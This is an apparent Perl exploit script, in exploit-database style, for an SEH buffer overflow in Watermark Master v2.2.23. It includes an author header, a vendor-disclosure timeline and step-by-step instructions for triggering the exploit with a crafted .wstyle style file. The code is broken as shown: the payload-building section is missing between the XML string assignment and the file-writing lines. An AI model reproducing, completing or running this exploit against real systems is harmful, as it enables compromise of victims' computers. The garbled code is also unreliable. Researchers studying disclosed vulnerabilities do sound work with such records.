#!/usr/bin/perl ######################################################################################### # Exploit Title: Watermark Master v2.2.23 .wstyle Buffer Overflow (SEH) # Date: 10-28-2013 # Exploit Author: Mike Czumak (T_v3rn1x) -- @SecuritySift # Vulnerable Software: Watermark Master v2.2.23 # Software Link: http://www.videocharge.com/download/WatermarkMaster_Install.exe # Version: 2.2.23 # Tested On: Windows XP SP3 ######################################################################################### # Timeline: # - Oct 28: Vuln discovered, vendor alerted and acknowledged receipt of bug submission # - Oct 29: Requested fix timeline from vendor for public disclosure # - Nov 1: Similar exploit publicaly released for same version of software # -- http://www.exploit-db.com/exploits/29327/ # - Nov 3: No response from vendor, follow-up email sent # - Nov 14: No response from vendor, public disclosure ######################################################################################### # Creates a malicious Style file (.wstyle) # # To exploit: # 1) Place sploit.wstyle file in Video Styles folder # ..\Videocharge Software\Watermark Master\Styles\Video # 2) Launch Watermark Master application, add an image and apply the style # WaterMark --> Add --> Image (can also add text, rectangle, etc) # WaterMark --> Apply Style... --> sploit # 3) Save (Ctrl+s) -- Application will crash, launching the exploit ######################################################################################### my $buffsize = 15000; # sets buffer size for consistent sized payload my $xmlstart = ' $file"); print FILE $buffer; close(FILE); print "Exploit file created [" . $file . "]\n"; print "Buffer size: " . length($buffer) . "\n";